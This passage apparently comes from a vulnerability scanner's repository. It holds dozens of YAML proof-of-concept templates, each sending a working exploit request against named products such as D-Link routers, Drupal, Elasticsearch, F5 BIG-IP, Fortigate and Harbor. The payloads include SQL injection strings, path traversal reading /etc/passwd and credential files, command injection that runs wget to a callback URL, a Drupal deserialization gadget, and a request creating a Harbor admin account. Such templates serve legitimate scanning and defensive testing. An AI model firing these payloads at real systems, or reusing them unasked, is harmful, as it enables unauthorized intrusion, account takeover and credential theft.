response.body.bcontains(b"81dc9bdb52d04dc20036dbd8313ed055") && response.body.bcontains(b"Discuz! info: MySQL Query Error") 9 | detail: 10 | author: leezp 11 | Affected Version: "discuz <=v7.2" 12 | vuln_url: "/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20" 13 | links: 14 | - https://blog.csdn.net/weixin_40709439/article/details/82780606 15 | -------------------------------------------------------------------------------- /pkg/pocs/discuz-wechat-plugins-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-discuz-wechat-plugins-unauth 2 | rules: 3 | - method: GET 4 | path: '/plugin.php?id=wechat:wechat&ac=wxregister' 5 | follow_redirects: false 6 | expression: | 7 | response.status == 302 && "set-cookie" in response.headers && response.headers["set-cookie"].contains("auth") && "location" in response.headers && response.headers["location"].contains("wsq.discuz.com") 8 | detail: 9 | author: JrD 10 | links: 11 | - https://gitee.com/ComsenzDiscuz/DiscuzX/issues/IPRUI 12 | -------------------------------------------------------------------------------- /pkg/pocs/discuz-wooyun-2010-080723.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-discuz-wooyun-2010-080723 2 | set: 3 | rand: randomInt(200000000, 210000000) 4 | rules: 5 | - method: GET 6 | path: >- 7 | /viewthread.php?tid=10 8 | headers: 9 | Cookie: GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Bsearcharray%5D=/.*/eui; GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Breplacearray%5D=print_r(md5({{rand}})); 10 | follow_redirects: false 11 | expression: | 12 | response.status == 200 && response.body.bcontains(bytes(md5(string(rand)))) 13 | detail: 14 | version: Discuz 7.x/6.x 15 | author: Loneyer 16 | links: 17 | - https://github.com/vulhub/vulhub/tree/master/discuz/wooyun-2010-080723 18 | -------------------------------------------------------------------------------- /pkg/pocs/dlink-850l-info-leak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dlink-850l-info-leak 2 | rules: 3 | - method: POST 4 | path: /hedwig.cgi 5 | headers: 6 | Content-Type: text/xml 7 | Cookie: uid=R8tBjwtFc8 8 | body: |- 9 | ../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml 10 | follow_redirects: false 11 | expression: > 12 | response.status == 200 && response.body.bcontains(b"") && response.body.bcontains(b"") && response.body.bcontains(b"OK") 13 | detail: 14 | author: cc_ci(https://github.com/cc8ci) 15 | Affected Version: "Dir-850L" 16 | links: 17 | - https://xz.aliyun.com/t/2941 -------------------------------------------------------------------------------- /pkg/pocs/dlink-cve-2019-16920-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dlink-cve-2019-16920-rce 2 | set: 3 | reverse: newReverse() 4 | reverseURL: reverse.url 5 | rules: 6 | - method: POST 7 | path: /apply_sec.cgi 8 | headers: 9 | Content-Type: application/x-www-form-urlencoded 10 | body: >- 11 | html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20{{reverseURL}} 12 | follow_redirects: true 13 | expression: | 14 | response.status == 200 && reverse.wait(5) 15 | detail: 16 | author: JingLing(https://hackfun.org/) 17 | links: 18 | - https://www.anquanke.com/post/id/187923 19 | - https://medium.com/@80vul/determine-the-device-model-affected-by-cve-2019-16920-by-zoomeye-bf6fec7f9bb3 20 | -------------------------------------------------------------------------------- /pkg/pocs/dlink-cve-2019-17506.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dlink-cve-2019-17506 2 | rules: 3 | - method: POST 4 | path: /getcfg.php 5 | headers: 6 | Content-Type: application/x-www-form-urlencoded 7 | body: SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a 8 | follow_redirects: false 9 | expression: > 10 | response.status == 200 && response.body.bcontains(b"") && response.body.bcontains(b"") 11 | detail: 12 | author: l1nk3r,Huasir(https://github.com/dahua966/) 13 | links: 14 | - https://xz.aliyun.com/t/6453 15 | -------------------------------------------------------------------------------- /pkg/pocs/dlink-cve-2020-9376-dump-credentials.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dlink-cve-2020-9376-dump-credentials 2 | rules: 3 | - method: POST 4 | path: /getcfg.php 5 | headers: 6 | Content-Type: application/x-www-form-urlencoded 7 | body: >- 8 | SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1 9 | expression: > 10 | response.status == 200 && response.body.bcontains(b"Admin") && response.body.bcontains(b"") && response.body.bcontains(b"") 11 | detail: 12 | author: x1n9Qi8 13 | Affected Version: "Dlink DIR-610" 14 | links: 15 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9376 -------------------------------------------------------------------------------- /pkg/pocs/dlink-dsl-2888a-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dlink-dsl-2888a-rce 2 | rules: 3 | - method: GET 4 | path: /page/login/login.html 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.content_type.contains("text/html") && response.body.bcontains(b"var ModelName=\"DSL-2888A\";") 8 | - method: POST 9 | path: / 10 | body: username=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b 11 | headers: 12 | Content-Type: application/x-www-form-urlencoded 13 | follow_redirects: false 14 | expression: | 15 | response.status == 302 && response.headers["location"] == "/page/login/login_fail.html" 16 | - method: GET 17 | path: /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=id 18 | follow_redirects: false 19 | expression: | 20 | response.status == 200 && response.content_type.contains("text/html") && response.body.bcontains(b"uid=0(admin) gid=0(admin)") 21 | detail: 22 | author: mvhz81 23 | info: dlink-dsl-2888a CVE-2020-24579(Insufficient Authentication) + Hidden Functionality (CVE-2020-24581) = RCE 24 | links: 25 | - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/d-link-multiple-security-vulnerabilities-leading-to-rce/ 26 | -------------------------------------------------------------------------------- /pkg/pocs/docker-api-unauthorized-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-docker-api-unauthorized-rce 2 | rules: 3 | - method: GET 4 | path: /info 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"KernelVersion") && response.body.bcontains(b"RegistryConfig") && response.body.bcontains(b"DockerRootDir") 8 | 9 | detail: 10 | author: j4ckzh0u(https://github.com/j4ckzh0u) 11 | links: 12 | - https://github.com/vulhub/vulhub/tree/master/docker/unauthorized-rce 13 | -------------------------------------------------------------------------------- /pkg/pocs/docker-registry-api-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-docker-registry-api-unauth 2 | rules: 3 | - method: GET 4 | path: /v2/ 5 | follow_redirects: false 6 | expression: > 7 | response.status == 200 && "docker-distribution-api-version" in response.headers && response.headers["docker-distribution-api-version"].contains("registry/2.0") 8 | - method: GET 9 | path: /v2/_catalog 10 | follow_redirects: false 11 | expression: > 12 | response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"repositories") 13 | detail: 14 | author: p0wd3r 15 | links: 16 | - http://www.polaris-lab.com/index.php/archives/253/ 17 | -------------------------------------------------------------------------------- /pkg/pocs/dotnetcms-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dotnetcms-sqli 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | r2: randomInt(1, 100) 5 | rules: 6 | - method: GET 7 | path: /user/City_ajax.aspx 8 | follow_redirects: false 9 | expression: | 10 | response.status == 200 11 | - method: GET 12 | path: >- 13 | /user/City_ajax.aspx?CityId={{r2}}'union%20select%20sys.fn_sqlvarbasetostr(HashBytes('MD5','{{r1}}')),2-- 14 | follow_redirects: false 15 | expression: | 16 | response.status == 200 && response.body.bcontains(bytes(md5(string(r1)))) 17 | detail: 18 | Affected Version: "v1.0~v2.0" 19 | links: 20 | - https://www.cnblogs.com/rebeyond/p/4951418.html 21 | - http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0150742 22 | -------------------------------------------------------------------------------- /pkg/pocs/draytek-cve-2020-8515.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-draytek-cve-2020-8515 2 | rules: 3 | - method: POST 4 | path: /cgi-bin/mainfunction.cgi 5 | headers: 6 | Content-Type: text/plain; charset=UTF-8 7 | body: >- 8 | action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2f/etc/passwd%26id%26pwd&loginUser=a&loginPwd=a 9 | expression: > 10 | response.status == 200 && response.body.bcontains(b"uid") && response.body.bcontains(b"gid") && "root:[x*]:0:0:".bmatches(response.body) 11 | detail: 12 | author: Soveless(https://github.com/Soveless) 13 | Affected Version: "Vigor2960, Vigor300B, Vigor3900 < v1.5.1, VigorSwitch20P2121, VigorSwitch20G1280, VigorSwitch20P1280, VigorSwitch20G2280, VigorSwitch20P2280 <= v2.3.2" 14 | links: 15 | - https://github.com/imjdl/CVE-2020-8515-PoC 16 | -------------------------------------------------------------------------------- /pkg/pocs/druid-monitor-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-druid-monitor-unauth 2 | rules: 3 | - method: GET 4 | path: /druid/index.html 5 | expression: | 6 | response.status == 200 && response.body.bcontains(b"Druid Stat Index") && response.body.bcontains(b"DruidVersion") && response.body.bcontains(b"DruidDrivers") 7 | detail: 8 | author: met7or 9 | links: 10 | - https://github.com/alibaba/druid 11 | -------------------------------------------------------------------------------- /pkg/pocs/drupal-cve-2014-3704-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-drupal-cve-2014-3704-sqli 2 | rules: 3 | - method: POST 4 | path: /?q=node&destination=node 5 | body: >- 6 | pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or 7 | updatexml(0x23,concat(1,md5(666)),1)%23]=bob&name[0]=a 8 | follow_redirects: false 9 | expression: | 10 | response.status == 500 && response.body.bcontains(b"PDOException") && response.body.bcontains(b"fae0b27c451c728867a567e8c1bb4e53") 11 | detail: 12 | Affected Version: "Drupal < 7.32" 13 | links: 14 | - https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2014-3704 -------------------------------------------------------------------------------- /pkg/pocs/drupal-cve-2019-6340.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-drupal-cve-2019-6340 2 | set: 3 | host: request.url.host 4 | r1: randomLowercase(4) 5 | r2: randomLowercase(4) 6 | rules: 7 | - method: POST 8 | path: /node/?_format=hal_json 9 | headers: 10 | Content-Type: application/hal+json 11 | Accept: '*/*' 12 | body: | 13 | { 14 | "link": [ 15 | { 16 | "value": "link", 17 | "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:10:\"{{r1}}%%{{r2}}\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"printf\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}" 18 | } 19 | ], 20 | "_links": { 21 | "type": { 22 | "href": "http://{{host}}/rest/type/shortcut/default" 23 | } 24 | } 25 | } 26 | follow_redirects: true 27 | expression: | 28 | response.status == 403 && response.body.bcontains(bytes(r1 + "%" + r2)) 29 | detail: 30 | author: thatqier 31 | links: 32 | - https://github.com/jas502n/CVE-2019-6340 33 | - https://github.com/knqyf263/CVE-2019-6340 -------------------------------------------------------------------------------- /pkg/pocs/duomicms-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-duomicms-sqli 2 | rules: 3 | - method: GET 4 | path: >- 5 | /duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(2000000005))) 6 | follow_redirects: false 7 | expression: | 8 | response.body.bcontains(b"fc9bdfb86bae5c322bae5acd78760935") 9 | detail: 10 | author: hanxiansheng26(https://github.com/hanxiansheng26) 11 | Affected Version: "duomicms<3.0" 12 | links: 13 | - https://xz.aliyun.com/t/2828 -------------------------------------------------------------------------------- /pkg/pocs/dvr-cve-2018-9995.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dvr-cve-2018-9995 2 | rules: 3 | - method: GET 4 | path: >- 5 | /device.rsp?opt=user&cmd=list 6 | headers: 7 | Cookie: uid=admin 8 | follow_redirects: true 9 | expression: > 10 | response.status == 200 && response.body.bcontains(bytes("\"uid\":")) && response.body.bcontains(b"playback") 11 | detail: 12 | author: cc_ci(https://github.com/cc8ci) 13 | Affected Version: "DVR" 14 | links: 15 | - https://s.tencent.com/research/bsafe/474.html -------------------------------------------------------------------------------- /pkg/pocs/ecology-filedownload-directory-traversal.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ecology-filedownload-directory-traversal 2 | rules: 3 | - method: GET 4 | path: /weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"/weaver/") 8 | detail: 9 | author: l1nk3r 10 | links: 11 | - https://www.weaver.com.cn/cs/securityDownload.asp 12 | -------------------------------------------------------------------------------- /pkg/pocs/ecology-javabeanshell-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ecology-javabeanshell-rce 2 | set: 3 | r1: randomInt(40000, 44800) 4 | r2: randomInt(40000, 44800) 5 | rules: 6 | - method: POST 7 | path: /weaver/bsh.servlet.BshServlet 8 | body: >- 9 | bsh.script=print%28{{r1}}*{{r2}}%29&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw 10 | follow_redirects: false 11 | expression: | 12 | response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) 13 | detail: 14 | author: l1nk3r 15 | links: 16 | - https://www.weaver.com.cn/cs/securityDownload.asp -------------------------------------------------------------------------------- /pkg/pocs/ecology-springframework-directory-traversal.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ecology-springframework-directory-traversal 2 | rules: 3 | - method: GET 4 | path: /weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"/weaver/") 8 | detail: 9 | author: l1nk3r 10 | links: 11 | - https://www.weaver.com.cn/cs/securityDownload.asp 12 | -------------------------------------------------------------------------------- /pkg/pocs/ecology-syncuserinfo-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ecology-syncuserinfo-sqli 2 | set: 3 | r1: randomInt(40000, 44800) 4 | r2: randomInt(40000, 44800) 5 | rules: 6 | - method: GET 7 | path: >- 8 | /mobile/plugin/SyncUserInfo.jsp?userIdentifiers=-1)union(select(3),null,null,null,null,null,str({{r1}}*{{r2}}),null 9 | follow_redirects: true 10 | expression: | 11 | response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) 12 | detail: 13 | author: MaxSecurity(https://github.com/MaxSecurity) 14 | links: 15 | - https://www.weaver.com.cn/ 16 | -------------------------------------------------------------------------------- /pkg/pocs/ecshop-cnvd-2020-58823-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ecshop-cnvd-2020-58823-sqli 2 | set: 3 | r1: randomInt(40000, 44800) 4 | rules: 5 | - method: POST 6 | path: /delete_cart_goods.php 7 | body: id=0||(updatexml(1,concat(0x7e,(select%20md5({{r1}})),0x7e),1)) 8 | expression: | 9 | response.status == 200 && response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31))) 10 | detail: 11 | author: 凉风(http://webkiller.cn/) 12 | links: 13 | - https://mp.weixin.qq.com/s/1t0uglZNoZERMQpXVVjIPw -------------------------------------------------------------------------------- /pkg/pocs/elasticsearch-cve-2014-3120.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-elasticsearch-cve-2014-3120 2 | set: 3 | r: randomInt(800000000, 1000000000) 4 | r1: randomInt(800000000, 1000000000) 5 | rules: 6 | - method: POST 7 | path: /test/test1/123 8 | headers: 9 | Content-Type: application/json 10 | body: | 11 | { 12 | "name": "test" 13 | } 14 | expression: | 15 | response.status == 201 || response.status == 200 16 | - method: POST 17 | path: /_search 18 | headers: 19 | Content-Type: application/json 20 | body: |- 21 | { 22 | "size": 1, 23 | "query": { 24 | "filtered": { 25 | "query": { 26 | "match_all": { 27 | } 28 | } 29 | } 30 | }, 31 | "script_fields": { 32 | "command": { 33 | "script": "{{r}}+{{r1}}" 34 | } 35 | } 36 | } 37 | follow_redirects: true 38 | expression: | 39 | response.status == 200 && response.body.bcontains(bytes(string(r + r1))) 40 | 41 | detail: 42 | author: suancaiyu、violin 43 | elasticsearch: v1.1.1 44 | links: 45 | - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2014-3120 46 | -------------------------------------------------------------------------------- /pkg/pocs/elasticsearch-cve-2015-1427.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-elasticsearch-cve-2015-1427 2 | set: 3 | r1: randomInt(40000, 44800) 4 | r2: randomInt(40000, 44800) 5 | rules: 6 | - method: POST 7 | path: /test/test 8 | headers: 9 | Content-Type: application/json 10 | body: | 11 | { 12 | "name": "test" 13 | } 14 | expression: | 15 | response.status == 201 16 | - method: POST 17 | path: /_search 18 | headers: 19 | Content-Type: application/json 20 | body: | 21 | { 22 | "size":1, 23 | "script_fields":{ 24 | "lupin":{ 25 | "lang":"groovy", 26 | "script":"{{r1}}*{{r2}}" 27 | } 28 | } 29 | } 30 | expression: | 31 | response.status == 200 && response.content_type.icontains("json") && response.body.bcontains(bytes(string(r1 * r2))) 32 | detail: 33 | author: pululin(https://github.com/pululin) 34 | links: 35 | - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-1427 -------------------------------------------------------------------------------- /pkg/pocs/elasticsearch-cve-2015-3337-lfi.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-elasticsearch-cve-2015-3337-lfi 2 | rules: 3 | - method: GET 4 | path: /_plugin/head/../../../../../../../../../../../../../../../../etc/passwd 5 | expression: | 6 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 7 | 8 | detail: 9 | author: X.Yang 10 | links: 11 | - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-3337 12 | -------------------------------------------------------------------------------- /pkg/pocs/elasticsearch-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-elasticsearch-unauth 2 | rules: 3 | - method: GET 4 | path: / 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"You Know, for Search") 8 | - method: GET 9 | path: /_cat 10 | follow_redirects: false 11 | expression: | 12 | response.status == 200 && response.body.bcontains(b"/_cat/master") 13 | detail: 14 | author: p0wd3r 15 | links: 16 | - https://yq.aliyun.com/articles/616757 17 | -------------------------------------------------------------------------------- /pkg/pocs/etcd-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-etcd-unauth 2 | set: 3 | r1: randomLowercase(32) 4 | r2: randomLowercase(32) 5 | r3: randomLowercase(32) 6 | rules: 7 | - method: PUT 8 | path: /v2/keys/{{r1}}?dir=true 9 | follow_redirects: false 10 | expression: | 11 | response.status == 201 12 | - method: PUT 13 | path: /v2/keys/{{r1}}/{{r2}}?prevExist=false 14 | headers: 15 | Content-Type: application/x-www-form-urlencoded 16 | body: value={{r3}} 17 | follow_redirects: false 18 | expression: | 19 | response.status == 201 20 | - method: GET 21 | path: /v2/keys/{{r1}}/{{r2}}?quorum=false&recursive=false&sorted=false 22 | follow_redirects: false 23 | expression: | 24 | response.status == 200 && response.body.bcontains(bytes(r3)) 25 | 26 | detail: 27 | author: j4ckzh0u(https://github.com/j4ckzh0u) 28 | links: 29 | - https://www.freebuf.com/news/196993.html 30 | -------------------------------------------------------------------------------- /pkg/pocs/etouch-v2-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-etouch-v2-sqli 2 | rules: 3 | - method: GET 4 | path: >- 5 | /upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)' 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"c4ca4238a0b923820dcc509a6f75849b") 8 | detail: 9 | author: MaxSecurity(https://github.com/MaxSecurity) 10 | links: 11 | - https://github.com/mstxq17/CodeCheck/ 12 | - https://www.anquanke.com/post/id/168991 -------------------------------------------------------------------------------- /pkg/pocs/f5-tmui-cve-2020-5902-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-f5-tmui-cve-2020-5902-rce 2 | rules: 3 | - method: POST 4 | path: >- 5 | /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp 6 | headers: 7 | Content-Type: application/x-www-form-urlencoded 8 | body: fileName=%2Fetc%2Ff5-release 9 | follow_redirects: true 10 | expression: | 11 | response.status == 200 && response.body.bcontains(b"BIG-IP release") 12 | detail: 13 | author: Jing Ling 14 | links: 15 | - https://support.f5.com/csp/article/K52145254 16 | - https://github.com/rapid7/metasploit-framework/pull/13807/files 17 | -------------------------------------------------------------------------------- /pkg/pocs/fangweicms-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-fangweicms-sqli 2 | set: 3 | rand: randomInt(200000000, 210000000) 4 | rules: 5 | - method: GET 6 | path: /index.php?m=Goods&a=showcate&id=103%20UNION%20ALL%20SELECT%20CONCAT%28md5({{rand}})%29%23 7 | expression: | 8 | response.body.bcontains(bytes(md5(string(rand)))) 9 | detail: 10 | author: Rexus 11 | Affected Version: "4.3" 12 | links: 13 | - http://www.wujunjie.net/index.php/2015/08/02/%E6%96%B9%E7%BB%B4%E5%9B%A2%E8%B4%AD4-3%E6%9C%80%E6%96%B0%E7%89%88sql%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/ 14 | -------------------------------------------------------------------------------- /pkg/pocs/feifeicms-lfr.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-feifeicms-lfr 2 | rules: 3 | - method: GET 4 | path: /index.php?s=Admin-Data-down&id=../../Conf/config.php 5 | expression: | 6 | response.status == 200 && response.body.bcontains(b"") && response.body.bcontains(b"") 8 | detail: 9 | author: l1nk3r(http://www.lmxspace.com/) 10 | links: 11 | - http://foreversong.cn/archives/1378 12 | -------------------------------------------------------------------------------- /pkg/pocs/flink-jobmanager-cve-2020-17519-lfi.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-flink-jobmanager-cve-2020-17519-lfi 2 | rules: 3 | - method: GET 4 | path: /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd 5 | expression: | 6 | response.status == 200 && "^root:[x*]:0:0:".bmatches(response.body) 7 | detail: 8 | author: MaxSecurity(https://github.com/MaxSecurity) 9 | links: 10 | - https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17519 11 | -------------------------------------------------------------------------------- /pkg/pocs/fortigate-cve-2018-13379-readfile.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-fortigate-cve-2018-13379-readfile 2 | 3 | rules: 4 | - method: GET 5 | path: "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" 6 | headers: 7 | Content-Type: application/x-www-form-urlencoded 8 | follow_redirects: true 9 | expression: response.body.bcontains(bytes("fgt_lang")) && response.body.bcontains(bytes("Forticlient")) 10 | detail: 11 | author: tom0li(https://tom0li.github.io/) 12 | links: 13 | - https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html 14 | -------------------------------------------------------------------------------- /pkg/pocs/frp-dashboard-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-frp-dashboard-unauth 2 | groups: 3 | unauth: 4 | - method: GET 5 | path: /api/proxy/tcp 6 | follow_redirects: true 7 | expression: | 8 | response.status == 200 && response.content_type.contains("text/plain") && response.body.bcontains(b"proxies") 9 | defaultpassword: 10 | - method: GET 11 | path: /api/proxy/tcp 12 | follow_redirects: false 13 | expression: | 14 | response.status == 401 && response.body.bcontains(b"Unauthorized") 15 | - method: GET 16 | path: /api/proxy/tcp 17 | headers: 18 | Authorization: Basic YWRtaW46YWRtaW4= 19 | follow_redirects: false 20 | expression: | 21 | response.status == 200 && response.content_type.contains("text/plain") && response.body.bcontains(b"proxies") 22 | -------------------------------------------------------------------------------- /pkg/pocs/gilacms-cve-2020-5515.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-gilacms-cve-2020-5515 2 | set: 3 | r1: randomInt(200000000, 210000000) 4 | rules: 5 | - method: GET 6 | path: /admin/sql?query=SELECT%20md5({{r1}}) 7 | expression: | 8 | response.body.bcontains(bytes(md5(string(r1)))) 9 | detail: 10 | author: PickledFish(https://github.com/PickledFish) 11 | links: 12 | - https://infosecdb.wordpress.com/2020/01/05/gilacms-1-11-8-admin-sqlquery-sql-injection/ 13 | -------------------------------------------------------------------------------- /pkg/pocs/glassfish-cve-2017-1000028-lfi.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-glassfish-cve-2017-1000028-lfi 2 | rules: 3 | - method: GET 4 | path: /theme/META-INF/%c0%ae%c0%ae/META-INF/MANIFEST.MF 5 | follow_redirects: true 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"Ant-Version:") && response.body.bcontains(b"Manifest-Version:") 8 | detail: 9 | version: <4.1.0 10 | author: sharecast 11 | links: 12 | - https://github.com/vulhub/vulhub/tree/master/glassfish/4.1.0 -------------------------------------------------------------------------------- /pkg/pocs/go-pprof-leak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-go-pprof-leak 2 | rules: 3 | - method: GET 4 | path: "/debug/pprof/" 5 | expression: | 6 | response.status == 200 && response.body.bcontains(bytes(string(b"Types of profiles available"))) && response.body.bcontains(bytes(string(b"Profile Descriptions"))) 7 | - method: GET 8 | path: "/debug/pprof/goroutine?debug=1" 9 | expression: | 10 | response.status == 200 && response.body.bcontains(bytes(string(b"goroutine profile: total"))) 11 | detail: 12 | author: pa55w0rd(www.pa55w0rd.online/) 13 | Affected Version: "go pprof leak" 14 | links: 15 | - https://cloud.tencent.com/developer/news/312276 16 | -------------------------------------------------------------------------------- /pkg/pocs/h2-database-web-console-unauthorized-access.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-h2-database-web-console-unauthorized-access 2 | rules: 3 | - method: GET 4 | path: /h2-console 5 | follow_redirects: true 6 | expression: > 7 | response.status == 200 && response.body.bcontains(b"Welcome to H2") 8 | search: | 9 | location.href = '(?P.+?)' 10 | - method: GET 11 | path: /h2-console/{{token}} 12 | expression: | 13 | response.status == 200 && response.body.bcontains(b"Generic H2") 14 | detail: 15 | author: jujumanman (https://github.com/jujumanman) 16 | links: 17 | - https://blog.csdn.net/zy15667076526/article/details/111413979 18 | - https://github.com/vulhub/vulhub/tree/master/h2database/h2-console-unacc 19 | -------------------------------------------------------------------------------- /pkg/pocs/hadoop-yarn-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-hadoop-yarn-unauth 2 | rules: 3 | - method: GET 4 | path: /ws/v1/cluster/info 5 | follow_redirects: true 6 | headers: 7 | Content-Type: application/json 8 | expression: | 9 | response.status == 200 && response.body.bcontains(b"resourceManagerVersionBuiltOn") && response.body.bcontains(b"hadoopVersion") 10 | detail: 11 | author: p0wd3r,sharecast 12 | links: 13 | - https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn 14 | -------------------------------------------------------------------------------- /pkg/pocs/harbor-cve-2019-16097.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-harbor-cve-2019-16097 2 | set: 3 | r1: randomInt(5, 10) 4 | r2: randomLowercase(r1) 5 | rules: 6 | - method: GET 7 | path: / 8 | expression: response.body.bcontains(b"Harbor") 9 | - method: POST 10 | path: /api/users 11 | headers: 12 | Content-Type: application/json 13 | body: >- 14 | {"username": "{{r2}}", "has_admin_role": true, "password": "{{r2}}", 15 | "email": "{{r2}}@example.com", "realname": "{{r2}}"} 16 | follow_redirects: false 17 | expression: | 18 | response.status == 201 19 | detail: 20 | author: scanf & Soveless(https://github.com/Soveless) & cc_ci(https://github.com/cc8ci) 21 | links: 22 | - https://unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-from-zero-to-admin-cve-2019-16097/ 23 | - https://github.com/goharbor/harbor/issues/8951 24 | - https://www.freebuf.com/vuls/214767.html -------------------------------------------------------------------------------- /pkg/pocs/hikvision-cve-2017-7921.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-hikvision-cve-2017-7921 2 | rules: 3 | - method: GET 4 | path: /system/deviceInfo?auth=YWRtaW46MTEK 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"") && response.headers["content-type"] == "application/xml" 8 | detail: 9 | author: whwlsfb(https://github.com/whwlsfb) 10 | links: 11 | - https://packetstormsecurity.com/files/144097/Hikvision-IP-Camera-Access-Bypass.html 12 | -------------------------------------------------------------------------------- /pkg/pocs/ifw8-router-cve-2019-16313.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ifw8-router-cve-2019-16313 2 | rules: 3 | - method: GET 4 | path: >- 5 | /index.htm?PAGE=web 6 | follow_redirects: false 7 | expression: > 8 | response.status == 200 && response.body.bcontains(b"www.ifw8.cn") 9 | - method: GET 10 | path: >- 11 | /action/usermanager.htm 12 | follow_redirects: false 13 | expression: > 14 | response.status == 200 && 